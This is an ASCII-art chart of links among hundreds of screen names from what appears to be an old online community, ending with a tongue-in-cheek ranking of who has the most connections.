--|-|--------|----|-|---. | | | | | | | | | cerkit | | | | scat | | | | | | | | .-' | vera | | .-|--|---|-|-----------|-|-|---|--|----|-|--. | | | b3 | .' | skatin | | `--.| | dukeo | | | | | | | | | | | `-----|-|--.`. | .---|-' || |.-' | | | blueeyes | | | |.-|-|---------|-|--|-|-|-|---|----- evol! --- eerie | | | || | | | | || |.' | | | | | | ffej .--'|| || .-----|-' | | || dom | | | || || | | | | | | | | | .-'| |`--.| .-|---|-|--'| | | | | || || morph | | metalchic | | | | | || | | | |.--' carly | | | || || `----|-|---' | |`--|-|-|--|-|-- bF --' | 8ball ----'| | | | || || spacehog `.`. scuzz | | | | | `----|-----|---|-|---. xan | | | || |`-. `----|-|--. | `-|-|--|--. | | | | | | | | || | TH0M Y0RKE | | kurdt -|-----|-' | | `-----|-. | | beck | | | |`.`. | `-. | `-----|---.| crimson | | | `---|----. | | | `-|-|- collette `-. | `-- claud -|--.||.--' | | | nymph | | | | .-|-|-------|-----|-|---------|--|- pip!@ --. | | | | | | | | |.' | kablooie | | gumby | |.-'| || cancer | `-|----|---- beastie | ||.-' | | | | | | || | |`-. | | sample --' | | ||| mooer --' | | ladydeath | || | | iamjustme | | | | ||| || | | | | .--|----|--'| | | | | inuendo | | ||| || cardamon | | | | nitz | | | fatslayer .-|---' | | | ||| |`----------|-|-|-|-------|---|--|-----------|-' leesa hgirl | | ||| | tsoul .--' | | | sensei | littlestar | | | | | | ||| | | | | | | .------' | fried dcheese ----' | ||| | demon | aoxomoxoa --|-- poppie .----------' | | | ||| | | `----. | `-. | | | alecks abacab | wishchld | ||| `-- ostrich --|-|-. | | donnie | |.-------' | | ||`---------|-----|-|-|-|--|----' | || atropos assamite | dka | || jellyb | | | | | .---|-.|| |.--------' | | | |`. | | | | | gilmore | baital .-- novicane .--' katester | | | michelle_ .---|-|-|-|--|----|-----|--'| | | | .---' | | | | | | | | | | crayon | pol | | TOXiC79 | | _evol_ | | | abraxas | | | | | | .----|-|-|----------' | | | | | | | | | | | vritra --|-|---.| | |.- bonita80 | shroomy69 | | | mercuri | | | | | `---------.|.' || | ||.----------' | | | | | | `---|-|-|-|-- nerkles |||.-- GoNINzo! ------ september | | | | | lori | | | `-----------.|||| | ||`----------|------|-' | | | | | | | | mona ||||| dazey |`----- ambigu0us --|---' | | | skooter nic | | | | ||||| | | | | vocks | | | | | | | | grimwater -.||||| NightMyst | | | | | sita -- ninja | | | |||||| | marcus666 | | | .---'| `-.| | | path0s --.||||||.-- turbo -- ivy256 | | | | jules ziggy || | | |||||||| | dannyman | | | || || | | photochic ||||||||.-- holden -- syn | | | | | krampus --'| || | | | ||||||||| | christy | | | | || | | spirit --.||||||||| lucifuge yumas | | | | | indpuck --' || | | | ||||||||||.-' | .'.-- kkrazy | | | .--'| | `----|---- crank!@#@%! ------ jamesy --|-|-------. | | | all-of-nitco | `-----.| | | || | bex | | | .- LCN | | `-. | `-----. || | | |`-|-----|--------|---|-|---|---.| | `-. | fishhead hawk | |`-. | | | | .---|--------|---' | | || | | | | | | | | | | `--|-|-- puck --- kinessa --|--.|| | | | tamago | darwin | | | | | | | .--' | ||| | .-|-|-----|---|----|----|-|--|---|---|----|-' | .-----------------' ||| | | | | art | | `-- kaia -|---|---|---.| | | graywolf jakey ||| | | | | | |.--|--------' `-. | | | || `--|-------.| .---' ||| | | | | seaya `---- fawn --|-|---|---|-- mogel --|------ pixy -------.||| | | | | | .---|---|-|---|---|----' || `-----. | |`------. |||| | | | | slug grlfrmars `-. | | | `----. |`-------. | | `------.| |||| | | | | | | | | | | `------. | nykia | | | turtle || |||| | | | | kev-man | wildcard | `-|---------.| `--. | | | | || |||| | | | `---------|----------|---|--------.|| hateball | | | jook || |||| | | `. spectacle `---|-------.||| .-----|-|-' | | || |||| | |.-|-------------------------|------ murmur -|-----|-|---' | ogre || |||| | || | | || ||`--|-----|-|-----|--|-. || |||| | || | .-----------|-------'| |`---|----.| | peggy | || |||| | || | Guitarzan --|-. CapnRat | | | | || | | | || |||| | || | .--|-|---|-----|- keroppi | .--|-- page! -- ghort | || |||| | || | crash313 | | | bond `--. | | | | .'| | | | | || |||| | || |.---|-----|--|-|----|-------|-|-----|-|--|--|-|--|----' | | || |||| | || || windx --|--|-' | .----|-'.----' | | | | | | | || |||| | || ||.-'|.----'.-|------|--|----|--|------' | | |.-|------' | || |||| | || ||| || | | | |.---|--|--. | | || | dedboy | || |||| | || ||| || .---' | hitchcock --|--|--|------|--' || | | | | || |||| | || ||| || | | | | | | | | .' larissa | .'| | | glynis || |||| | || ||| || | .--|--|-|-|-|-|---|-|--. | | | | | || |||| | || ||| || | | | | | | | | | | AnonGirl | | | | | Juliette || |||| | || ||| || | | | | | | | | | | | | .-|-|-|-' | || |||| | || ||| swisspope | | | | | | | | Medusa --|-|-|-|-|---- PrimeX || |||| | || |||.-' ||`--|--|-|-|-|-|---|-|----------|-|-|-|-|------------'| |||| | || |||| || | | | | | | | | cinnabon | | | | | Fiyaball | |||| | || |||| |`---|--|-|-|-|-|---|-|--|-----. `-|-|-|-|----------|-.| |||| | || ||||.--- piglet -' | | | `---|-|--|-----|-. | | | | | || |||| | || ||||| `----|-|-|-----|-|--|-----|-|-|-|-' | | || |||| | || ||||| pie -- bor | | | .---' | | .-|-|-|-|---|-- Quarex | || |||| | || ||||| | | | | | .---' | | | | | |.--' | | || |||| | || ||||| lankan --|-|-|-|-|- sweeney | | | | || RaggedyAnne | || |||| | || ||||`----. | | | | | | | | | | || | | | || |||| | || |||`---. | | | | | | toasty --' | | | || | `-.| || |||| | || ||`----|-|- PoGo .-' | `-|-|------. | | | || PointBlank || || |||| | || waar | | | |.--|---' `----. | | | | |`-. | || || |||| | || || | | | | || | .----|-|-----|-|-|-|--|--- hylonome || |||| | || || | .-|-|- hillary -|-----|----|-|-----|-|-|-|--|------------.|| |||| | || || | | | | | | |`--|- ideaman | | | | | | | dr0ne ||| |||| | || || `-|-|-|---|-|-|---|----------|-|-----|-|-|-|- ryu ---.| ||| |||| | || || .-|-|-|---' | `---|-- Fowlez | | | | | | .'| carrie ||| |||| | || || | | | `-----|-----|--. | | | | | | | | | ||| |||| | || |`-|-|-|-- severino | RottenZ -|-|-----|-|-|-' | | nuprinboy ||| |||| | || | | | | | | | | || | | | | | | | | ||| |||| | || | .' | | laurak -----' | | |`--|-|---- narya --' | redfox ||| |||| | || | | | | | `--------' | `--.| | | | ||| |||| | || | | `-|-|-- Dravanavin poto || | djbump feival --. ||| |||| | || | | `-|--------------------.|| |.--' | ||| |||| | || | | kyst | renen -------- jamming roller ||| |||| | || | `---|--|---- fritz clinto | seth -------------------'|| |||| | || `--- SiN13 --------|---|--------' | | .------------------'| |||| | |`--. `--------- tracy -------------' | | trep |||| | | .-|--------------------------------------|---' $t.andrew | |||| | | | | GWEN STEPHANI SARA GILBERT candyrain | | tart |||| | | | | | | | fatima --' | |||| | | | | BILLY C0RGAN GAVIN R0SSDALE DREW BARRYM0RE | |.--------' |||| | | | | `---. | | | ||.---------'||| | | | | ED N0RT0N -- C0URTNEY L0VE -----' mysl minstrelle |||.---------'|| | | | | .----' | | | `-----.||||.---------'| | | | | KURT C0BAIN TRENT REZN0R -- tammy `----|------.||||||.---------' | | | | | | |`-------|--- *gweeds@!#* -------. | | | | MARY L0RD T0RI AM0S JELL0 BIAFRA | .---'||| |||`--------.| | | | | | | .--'|| ||`--------.|| | | | |.----- trilobyte --- Schquimpy freqout --|-|-|---'| |`--------.||| | | | || | | | | | | | .' WL |||| | | | || chinagirl amos -- EddieV `-- Nex | | | | | |||| | | | || .------------|-------' | | | | dave_rast |||| | | | sonia ------- velcro agentorange moonlyte | | | | |||| | | | | | |`----. `----. | | | | | | lemson |||| | | | | | sate plexus | savvy neko --' | | | | | |||| | | | | | | | | .-'| | .-|-|-|-- whoops |||| | | | | gage `-- rabidchild kirshana | Katia | | | | || |||| | | | | | | | | | | | jess |`-- nyar |||| | | | argent fate beaker | gnarf Sylvie | | | | | | |||| | | | .-----------|---|-----|------------------' | | andrew | skora |||| | | | | fuaim sedrick | | | | |||| | | | | anathema .----------------------|-|----|---' |||| | `-|--|-|-----------------|-. .------------------' | mswicked |||| | | | | nadyalec erise | | | .--------- duatra -' .-------------'||| | .-|--' | | .--' | | | | | timbrel | | ||| | | | riotboi tao puff | | | | | | |.-- nineve | random-tox ||| | | | `-----. | | | | | | .-- corp! ----------' | .----'|| | | `- tanadept XunilOS | | | | | | | |||| silicosis -- espidre ---.|| | | | ||`-----. | | | | | | | | |||| | ||| | | siren |`---. skywind | | | | | | |||| mudge -- shewolf -- iskra ||| | | | `-. | | | | | | | |||| | ||| | | kingtrent | cbnoonan --|-|-|-|-|-|---'||| r2 -- mujahadin level6 ||| | | `------. | | | | | | | .'|| `---. `-.||| | | lilindian | lex | | | | | | | || ssq teq -- vYrus | sp0t |||| | | | | | | | | | | | | || `-------------.| | | |||| | | Goddess4u | lorah | | | | | | | |`. anarchist --. || | |.--'||| | | | | | | | | | | | | | | | || | || ||| | | .------ DrkSphere | | | | | | | | | | tymat -- *pinguino!##@#* ||| | | | | || |`----|-|-|-|-|-|-|---|-|-|---|-------'|||||||||||| ||| | | | CrazyLuna || | `.| | | | | | | | | gemmi |||||||||||| ||| | | | .-'| meelah || | | | | | | | | |||||||||||| ||| | | Sweetgal_ | | || | | | | | | | | barkode --'||||||||||| ||| | | | Wi|dChild || | | | | | | | | ||||||||||| ||| | | angeleyes .'| | | | | | | | | is0crazy ---'|||||||||| ||| | | .--|-|-|-|-|-|-|---|-|-|--------------'||||||||| ||| | | gersh | | | | | | | | | | r_avenger --'|||||||| ||| | | aquis -----------|-|-|-|-|-|-|---|-|-|----------------'||||||| ||| | | monkeygrl | | | | | | | | | | ter0daktyl --'|||||| ||| | | skully ------|-------|-|-|-|-|-|-|---|-|-|------------------'||||| ||| | | logicbox ----|-|-|-|-|-|-|---|-|-|-------------------'|||| ||| | | | | | | | | | | | | *apok0lyps* ------'||| ||| | | .------------------|-|-|-|-|-|-|---|-|-|-------|-------------'|| ||| | |.--|-----------. .----|-|-|-' | | | | | | *kamira* .---'|.-'|| | || | | | | | | | | | | | | | || || | ||.-|--------- sarlo --|-|-|---|-' | | | | ao -. quisling tsk .-'| .'| | ||| p3nny |||`---|-|-|---|--.| | | | | | .-------|---|--|-|-|-' ||| | ||| | | | | niala | | | wintarose | .-' | | | ||| sari ||`----|-|-|-. | | | | | | | | | || | | .--' | | ||| | YYZ || | | | | | | laz | | | sinner | | |`. | | | kara | ||| *rage* | |`-----|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|----' | ||| | astraea ---|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|------' ||| rio | | | | | | `-|-----|-|-|--------|-|-|-|--|-|-|--------. ||| | | phz .-|-' `-|---|---. | | | .------|-|-|-|--' `-|-------.| ||| capone |.----|-|-----|---' | | | | | corwin | | `------|---. || ||| asriel --|-|-----|-------|-|-|-|-|--------' valgamon | | || ||| b0gus -----.| | | | timb0 | | | | | `--|---|--.|| ||| .---- gita | | `. | | | | | | | | ||| ||| drd00m | | | | minjo | | | | phone blueadept | | ||| ||| veggie --|-|------|---|----|-|-|-|------|--|---------' | ||| ||| | | | | | | | | .-- tele -- rambone `-.||| ||| .--- pickaxe --|-. | | | | | mrg | |||| ||`------------|----|-----|---|-|-|----|-|-|-|------' |||| || | |.----|---|-|-|----|-|-|-|-- xney3 --- fable -----.|||| || | ||.---|---|-|-|----|-|-|-' | ||||| || RoadRuner | |||.--|---|-|-|----|-|-|-- CosmicMJ schmoopie ||||| || `--|---.|||| | | | | | | | | | | ||||| || hayley | ||||| | | | | | | | arian vek -- sweeties | ||||| || | | ||||| | | | | | | | | | | ||||| || collision --|--.||||| | | | | | | | dj tamtam --- jonathan ||||| || | |||||| | | | | | | | | | ||||| || thoth | |||||| | | | | | | | discogurl -- candacep ||||| || | | ||||||.-|---|-|-|----|-|-|------------------------. ||||| || dpk arkuat | sQurl!#% | .-|-|-' | | | dwildstar phisher | ||||| || | | | | ||||| | | | | | | | | | | ||||| || _Melody_ --|-' ||||| | | | | | | | elek jimmie ----- boufa ||||| || | | | ||||| | | | | | | | | | | `.||||| || atticus | | ||||| | | | | .--|-|-|- comstud MSofty --' | |||||| || | `--. ||||| | | | | lump | | | `--. Kanan |||||| || flashman --|-'|||| | | | | | | | | LarZ -- Tay ------' | |||||| || | .---|--'||| | | | | prae | | | | | | |||||| |`. rezznor | .'|`-|-|-|-|------|-|-|-- Jon2 -' | | |||||| | | | | | | | | | | | | | | | |||||| | | marcus ---|--|-' | | | | | | | | TAYL0R HAWKINS | |||||| | | `-----|--|----|-|-|-|------|-|-|--. | | | |||||| | | | | | | | | | | | | | MINNIE DRIVER | |||||| `-|-. | | | | | | | | | persis ---------------' |||||| | | .---|--' | | | | | | | | `----- violator ---'||||| |.' | supox --|-|-|-|-. | | | morkeleb ----------------'|||| || spruance | `--. | | | `-|----|-|-|----------------------. |||| |`-|--|-----|---------|-|-|-|--.|.---|-|-|---------------------.| |||| .-|--' daria | zymotic | `.`-|- ark --|-|-|-- juniper --. || |||| | | |.-----' | .' | | ||| | | | | | || |||| | | cvk ----- cybele | .-|--|--'|`---|-|-|----|--. ivylotus || |||| | | |`----. | | | | ceili | | | Zem | || |||| | | hellenga | Lone-Wolf | `--|---. | | | | stillson || |||| | | | | | | | |`-|----|---|----|-|-|-. `----. | || |||| | | | regs | | miffy `--|----|- eris5 | | | | dudeman | | || |||| | | | | | `-. | `--. | | | | | | | | `-- sumogirl || |||| | | | | | | scottie | | | | | | | | `----. | | || |||| `-|-|---|--|---|------------|-|--|-|-|-|-|-|-----.| Aleph | eighmi |||| | | .-|--|---|- Wizzbane -|-|--' | | | | | || | | | | |||| .-|-|-|-|--|---|------------|-|----' | | | | Kaleid ----|--|---.| |||| | | | | `--|-. `--------. .-' | BLong | | | ||| |`--. | | bohr |||| | | | | | ChromeLi --|-|---|--------|-|-|-----'|| | halfman | |||| | | | | `------------|-|---|--. .--|-|-|------'| | | | |||| | | | | flatlandr ---- aynn --|--|--|--|-|-|-------|-|---' Mythrandr |||| | | `-|----------------.| | | O_Kei | | | | | |||| | | micki -- rdrunner || lb | | | | | magneto God |||| | | | || | iguana | | | Cones | | | |||| | | | rhendrix -- dbt ---|----|---|-|-|-----|-' hope Tatyana | |||| | | | | |.----|- pete0 | | | `-. |.----' | |||| | | | konkers time ---|--------|-|-|----- Rasputin ---- nympho |||| | | | .------------' `------. | | | | | | |||| `-|- hagbard MandaPanda -- Doobie | | | | LadyViper | VampKitty |||| .-' || | `--|-|-|-|--' | .-------------'||| | m0kab3chu QueenBrocco ---'| ZobZ | | | | Iphigenia | ||| | `-----------..-------|------|-|-|-|-------------|--------------'|| | chickhabit ---.|| Persephone | | | `-----------. | || |.-----------------.||| `---|-|-|-- Stu | | afsaneh || || AK47 --.|||| | | | | | | || || .------------.||||| kubiak | | | .---------- sync gauss || || | bfgrrl -- *meenk!@* ---' | | | | |.---' || || | .----------'| | |`----. vlaad | | | | discodan --.|| aloke || || | | nevre | fl00d | | | | | | ||| | || || | | kaos .-----' teletype | | | | professor ||| | lgas ----.|| ||.-|-|----|--|-------------|--|-----|-|-|-|---|-----.| ||| | | ||| |||.' | amity bumble --' AIDS .-|-|-|-|---|---- xgirl!@$ -|- deker ||| |||| | | | | | | | | | | .-'||| ||| | | | ||| |||| | style wmmr --|-- caitlin | | | | | | gwar ||| ||`-.| | `--.||| |||| | | | | | | | | | | ||| || emilia |||| |||| | coffeegrl .--|- The_Sock | | | | | | cg --'|| || | | | |||| ||||.-' | | .-'| | | | | | | | || || | | boto |||| ||||| nico Alucard | | | kitn | | | | | | dk ---'| || | | |||| ||||| | | | | | | | | | | | | | || | spig |||| ||||| anjee -- meethos | | | | | | | | | .-' swallow || | |||| ||||| | | | | `-|-|-|-|-|-|--. || `-- moose |||| ||||| METchiCK -|-' ^mindy^ | | | | | | ILUVJeNNA || |||| ||||| | ||||| | | | | | | | || |||| ||||| MrJuGGaLo ||||`--|- facedown | | | | | | || |||| ||||| |||`---|-----------|-|-|-|-|-|-- grimmy || |||| ||||| ||`----|-----------|-|-|-|-|-|-. || |||| ||||| phdave |`-----|- f_fisher | | | | | | deadapril || |||| ||||| | `------|-----------|-|-|-|-|-|-. || |||| ||||| Suzzeee dwymer -|-- Bruin | | | | | | supervixn || |||| ||||| `-------.| `--------. | | | | | | || |||| ||||| abbeycat --.|| NeuralizR | | | | | | | || |||| ||||| ||| | | | | | | | | || |||| ||||| lissa ||| Jen1 Briana | | | | | | || |||| ||||| `---.||| | .--'| | | | | | | | || |||| ||||| nyssa --- Wayhigh!@ | | | | | | | | || |||| ||||| .---' | ||| | | | | | | | | || |||| ||||| icy_girl | ||`---|-|---|-|-|-|-|-|-- allira |`---- adamw |||| ||||| | || | | | | | | | | .-' | || |||| ||||| etrigan meta4 |`----|-|---|-|-|-|-|-|-.| ryshask `--- loki |`.|||| ||||| | | .-' | | | | |.' | ||.-' | | | ||||| ||||| *am0eba* Suger | | | | | ||.-' ||| aries99 jazzy | | ||||| ||||| | | | | | | | ||| ||| | | | ||||| ||||| SWinder nettwerk | | | | ||| *tigerbeck* -- spacegirl ||||| ||||| | .---|---' | | | ||| | | | | | | | ||||| ||||| zeven tsal | romulen | | ||`-. | | | twichykat | | | ||||| ||||| | .----------'| | |.------|-' |`. | | | | | | | | ||||| ||||`--. `-|-- devious | | || `-. | | | | | soulvamp | | | ||||| |||`-. | | `-- phyzzix! -------|-|-|-' | | | | | ||||| |||.-|-|---|-- roman --'|| ||| | | | | timmerca | | | .'|||| ||||.' | | | || ||| | | | `--. route | | | |||| ||||| | | emmanuel --'| ||| | | | .----|----------|---|-|-|-'||| ||||| | | | .-----' ||`--------|-|-|-|-. martyn ginny | | | ||| ||||| | | philipw |`--. | | | | | .--------------|-|-|--'|| ||||| | | | homeysan | | | | `--|-- BernieS | | | || ||||| | | J0SH LAZIE | | .--|-|-|-|-. | .---------' | | || ||||| `---|----|--------. | caffiend `.| | | | | | u4ea | || ||||| | | riley | | || | | | | | krnl ---. | | || ||||| .--- wikked | | | lordjello || | | | | | .-- missx || ||||| | .--'||| | | | | | |`.| | | | | | | `. || ||||| | | ||| Weasel | | | demented1 | || | | | | readwerd kc | || ||||`-|-|-. ||| | .-|-|--|--' | | ||.' `--|----|-----------|--|-.|| |||| | | | ||`--. | | neal | hannah .--' ||| aliced | elizabeth | ||| |||| | | | |`-. | | | | | `--. .--|---.||| | | | | | | ||| |||| | | | | | | | | | | .---|--|--|--.||||.--' | | `-. deadlord | ||| |||| | | | | | | | | | | | `--|--|- ophie! ---|--|-. | | | | ||| ||||.-|-|-|-|--|-|-|-|-|-|-|-- erikb | || | | .--' | | | | genders | ||| ||||| | | | | | | | | | | | | | .'| | | | | | | | | ||| ||||| | | | | | | | | | | joe630 | | | | | | | | | | `-- eppie | ||| ||||| | | |.' | | `-|-|-|--|----.| | | | | | | .---|-|-|-----|---|--' ||| ||||| | | || .-|-|---|-' `--|-. || | | | | | | | | | | primal bix ||| ||||| | | || | | | tiffie --' | || | | | | | | | | | | ||| ||||| | | || | | | | | || | | | | | | | | | | jasonf ||| ||||| | | |`-|-|-|- X n0rmag3ne |`. | | | | | | | | | | | ||| ||||| | | | .' | | | | | | | | | | | | | | | | .--- judy ||| ||||| | | | | | `. | otopico `-|-|-|-|-|-|-|-|-|-- y-windows --------.||| ||||| | | | |.-|--|-' | | | | | | | | | | | | | |||| ||||| | | | || | | angelbaby --|-|-|-|-|-|-|-|-|---' | | |||| ||||| | | | || | | .----|-' | | | | | | | Moxie | | ThreeDays |||| ||||| | | | || | Jazzy1 dana --|-. | | | | | | | `--|-|-|--. | |||| ||||| | | | || | | | .---|-|-|-|-|-|-|-|-|-------|-|-' Slinky |||| ||||| | | | || `. | strat | .-|-|-|-|-|-|-|-|-' .----|-|---. | |||| ||||| | | | |`. | | | | | | | | | | | | Xavi .--|-|- BabyHuey |||| ||||| `-|-|-|-|-|-|--------. | | | | | | | | | | | || | | | | |||| ||||| `-|-|-|-|-|-- Ned -|-|-|-|-|-|-|-|-|-|-|-' || | | | rorrim | |||| |||||.----' | | | | | `-|-|-|-|-|-|-|-|-|-|-. |`-|--|-|----|---|-.|||| ||||||.-----' | | | Magenta | | | | | | | | | | | | | | | | | ||||| |||||||.------' | | | | | | | | | | | | | Taps | | | | | ||||| |||||||| .------' Lotus1 `-|-|-|-|-|-|-|-|-|-|-'||`-|--|-|- LamaKid ||||| |||||||| | | | | | | | | | | | | | || | | | | ||||| |||||||| | sunset | | | | | | | | | | | | || | | | | ||||| |||||||| | | | | | | | | | | | | | | | || | | | | ||||| |||||||| Mark kic | Cluey | | | | | | | | | | || | | | | ||||| |||||||`---.| | | | | | | | | | | | | || |.-' | | ||||| ||||||`---.|| | Logre | | | | | | | | | | || ||.--' | ||||| |||||`-. ||`-------|--. | | | | | | | | | | | || ||| | ||||| ||||| | *angieb* | | | | | | | | | | | | | || ||| SueVeneer | ||||| ||||`-.| | .---' sunni -|-|-|-|-|-|-|-|-|-|--'| |||.--' | ||||| |||`-.|| | | .----|--|--' | | | | | | | | | Khat |||| JulieJul | ||||| ||`. ||`-. | | | twi Opie | | | | | | | | | | .-'||| | | ||||| || | |`. | | .-|-|--------|---' | | | | | | | | | Jai ||`--- Jag --|-'|||| |`-|-|-|-|-|--|-|-|----. rosefairy | | | | | | | | | | |`. ||| | |||| |.-' | | | `--|-|-|---.| | | `-|-|-|-|-|-|-|-' | `-|-|----'|| `-.|||| ||.--|-|-|----|-|-|-- b_!@@ dara | | | | | | | |.--' | .---'| ||||| |||.-' | | .--|-|-|--'|| | | | | | | | | | || .--' | GoodGirl ||||| ||||.--|-|-|--' | | || | winmutt | | | | | | | || | |.----.| ||||| ||||| | | | .-|-|---'| | | | | | | | | || | || || ||||| ||||| | | | | | | | wolverine | | | | | | | || | Yummy Guyver ||||| |||||.-|-|-|--|-|-|----|-----------' | | | | | | || | |||| | ||||| ||||||.' | | | | | | xyg shinex | | | | | | || | Rosie -'||| | ||||| ||||||| | | | | | | | | `-|-|-|-|-|-. || | .-'|| | ||||| ||||||| `-|--|-|-|-- *spyder_bytes* | | | | | | || | Rapunzle || | ||||| |||||||.---|--|-|-|----|---------------' | | | | | || | | || | ||||| ||||||||.--' | `-|--. | CrakrMajk --|-|-|-|-|-'| | | Flame -'| | ||||| ||||||||| | `. | | .------------|-|-|-|-|--|-|-|-|-------|-|-'|||| ||||||||| phatgirl | `-|--. | lemony | | | | | | | | | Atomica | |||| ||||||||| | `--|-|-----|----. | | | | | | | | | | | |||| ||||||||| | | | Wizdom | | | | | | | | m00se | | |||| ||||||||| Twizzle | | | | .-|-|-|-|-|-|--|-|----------|--' |||| ||||||||| .--|------ ReelTime --' `-|-|-|-|-|-|-|--|-|--. Dolemite |||| ||||||||| | | .------'| | | | | | | | | | | | | |||| ||||||||| | | | Lullaby Sambrosia | | | | | | | | | nigel | QueenB |||| ||||||||| | | | | `---------. | | | | | | | | | `-------|-------.|||| ||||||||| | | | | b|iss | | | | | | | | | | | ||||| ||||||||| | | | RobertG .---|--|-|-' | | | | | | | | ||||| |||||||||.-|--|-|-----|-|-|- Mikey!# --|-|-|-|-|-|--|-------. Kyleel ||||| |||||||||| | `-|-----|-|-|--'| |||| | | | | | elektra | | ||||| |||||||||| | | | | | | |||`---|-|-|-|-|-|--|---. | RdKill ||||| |||||||||| | Zemora | Blondie ||`--. | | | | | | z1nk | | | ||||| |||||||||| | | .------|----|----'`-. | | | | | | | | AllyCat -. ||||| |||||||||| | `-|------|-- WanMan --|-|-|-|-|-|-|-|------|---' | | ||||| |||||||||| `---|------|----------. | | | | | | | misuse | .- Pbass | ||||| |||||||||| | Izzy `- Oscer --|-|-|-|-|-|-|-|--------|--|----' | ||||| |||||||||| | | | | | | | | | | | | | | MastElmo ||||| |||||||||| | | Brian-X Macc | | | | | | | | | `--.| | ||||| |||||||||| | | | | | | | | | | | | | `-- *Starr* | ||||| |||||||||| Maia!@% Bellez --|-' | | | | | | *B00bz* -----'| | | ||||| |||||||||| | ||`-------|----|---|-|-|-|-|-|--|-|------- Rig | | ||||| |||||||||| *Chef* |`------ Cidaq | | | | | | | | | .-------|--|-'|||| |||||||||| Breetai | | | | | | | | | | .--' | |||| |||||||||| | `-. | | | | | | | luci | | Female |||| |||||||||| Corn | NuConcept .---|-' | | | | | | | |`-|---.| | `.|||| |||||||||| | | | | `-. | | | | | | | | | *hydro311* ||||| |||||||||`--- lydia_atl PastaGal ---|-|-|-|-|-|--|-|-|--|--|----. .-'|||| ||||||||| | | | `-|-|-|-|-|--|-' `--|--|-- Shad0w |||| ||||||||| Pnutgirl | GonzoLoco DrMonk | | | | | `------|--|--. |||| ||||||||| | | | | | | | | .-------' | SessyJen |||| ||||||||| LilDave -' CompChick Gemni | | | | | | splat ---|--' |||| ||||||||| | .---' | | | | | | | .-' Spastica |||| ||||||||`-- bluesxxgrl .--- DH | KL | | | | | | `---|----' | |||| |||||||| | |.------|--' | | | | | | | CybrChrist |||| |||||||| | redmare ||.- SN | .--' | | | | | `---. |||| |||||||| | | |||.----|--|----|-|-' | phreaky VenusGirl |||| |||||||`--. | tabas --.||||.---|--' .--|-|---' .-------------'||| ||||||`---|-|------------.|||||| | .--|--' | *magpie* | .------'|| |||||| .-|-' r0ach |||||||.--|-|--' | `--.| m0rg1 | yy[z] || |||||| | | | .--- n0elle!@ | | onkeld badger || | | | || |||||| | | albatross .--' | || | | | | | || ajx --|-- mo || |||||| | | jsz | || `.| | littleone `-.|| .----|--. | || |||||`. `-|--. wing -------' |`---.||.--|------------ juliet --.| max-q || ||||`-|-. | | mooks nts |||| `-. gfm --. | || | || |||`. | | | `------------|---|-- *fuz!* --|-------- morgen | looey | || ||`-|-|-|-|-- kitkat^ ----|---|----'||`----|- lesb0 -|--|---|---. | || || | | | | | | || | | | | luq | || |`--|-|-|-|---------------|---|-----'| dangergrl earle | | | || | | | | | sparxx --- l0ra!@ ----' | | | | | scorpion | || | `-|-|-|---------------'|| || slawz | | WIL WHEAT0N | | | || | | | | dt --'| |`----------|--|--------. | sfuze | || | | | | .--' | .---' oghost mchemist --' | || | | `-|--------------|----|-------|---------------' | | || | | `--------------|--- theejoker zens -- skinflower suiciety | || | | rosieriv -- tfish | | | | | | || | | | | `-----. quagmire | monachus -|-|-- daud | || | | | chlamydiarose | | | | | | || | `------|---. | | nekkidamy polymorf `---. | .'.'| | .-- gheap | Zomba_Soul isis --------|---|------------|-|------|-|-' | | | .--- q | | | | | | | | | acronym | | | syndrome | |.-----' `-. | torquie ------|-- countzero | | | | | | || plexor | | | | | *thepublic* | | | || | | `--|----|--------|-- theora -- RAgent | | | | | || | | ludi dispater | | | rainbow lust!@@# --' | `--------|----|-- dildog -- ladyada .--|-----' | | |||| | | phen bopeep | .-|--|--- *maq* -. | |||| netmask -' .---|------' | | montel --. .-------|-|--|-----' | | | |||`-|--------. | el_jefe ---|-|-------- Heather sami | | .-----|---|-' ||| | | | | | | | | | | .---' | ||| | cal | | Mika tari --|-|-- dan_farmer .-- *pill* | | | vamprella ||| | | | | `-. | | | | .----|--|-|-|---|-------'|`. | Er1s | | val -- shipley -- muffy demonika --|--' | | purpcon | | | | | | | || | | | .-'| |||| .-' .-' | .---|-|-|-' JonM | | karrin --'| | danea mycroft | |||`-|--. | .-|-- kel -|---|-|-' | | | | | | | | ||| | lizzie | .-' | | | | JiJi | | CGD -- jen `-|--- banshee | | ||| | | | | | gh0st --|-|------' | `---------------|------------' | ||| | | sage | `--. .--' `-. shaedow Astaroth | wraith --|--'|| `-|------|----|----|-----.| | | | | | | |`----|------|-- *disorder* wednesday | DangerJen .--- se7en t | `-----|------|----|-|-|---------' | | | | `---. | onyx -- furie | | | blaise -- skippy | msk ---' simunye pandora `---|------------|----|-|------------------' ||| michelle ----|----' yt -- panther_modern ||`---------------------------------. .---|---------------. || .--------------------------- fizzgig --|-- rubella | |`----|-------------------------. | | | | | Imperia | deadgirl | | | | | | | | lethar ----------. |.-|--|---|-|---' neologic | Asmodeus | | | | || | | | `---. | | .--' | | | valeriee Mali netik -|-----|-- mayfair | Kalannar | Sinja | | | | | | | | | | | Xaotika StVitus | | | fishie -- Missa | E_D | | | | | | | | | | | outside -- emmie Frobozz | | belial --- Uadjit -- solomon -- Mottyl | | | | | | | | | | |`---. | rebrane | Murmur_gth | | | |.---------|-' Grue --|--|-- moomin13 | | | | | | | ||.--------|-----' | | `--------|------|---------|-- gothbitch! -------|-----------' Fiore --. JelloMold *bifrost* `--. | ||`---------|--------------'| | | `----- aex |`--- pahroza -- anubis MartYr | bile -- turtlgrl --------|----|------' | | | inox Miah secretboy Arkham Stipen - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage | | | Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira | | | fuz B00bz magpie pinguino -- pill maq -- apok0lyps - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "the big loop" is over 800 people! holy crap! work for the chart. the top rankings: ---------------- #1 winner -- pinguino & gweeds -- 21 links! it's a tie! #2 winner -- meenk -- 19 links! #3 winner -- crank -- 18 links! #4 winner -- xgirl -- 15 links! #5 winner -- n0elle & sQurl -- 13 links! it's a tie! honorable mention: ----------------- 12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix! 11 links: murmur, evol, lust, Mikey, & fuz! 10 links: pip, & tigerbeck! 9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika, & l0ra! be a winner *today*! - - - - - - - - - - - - 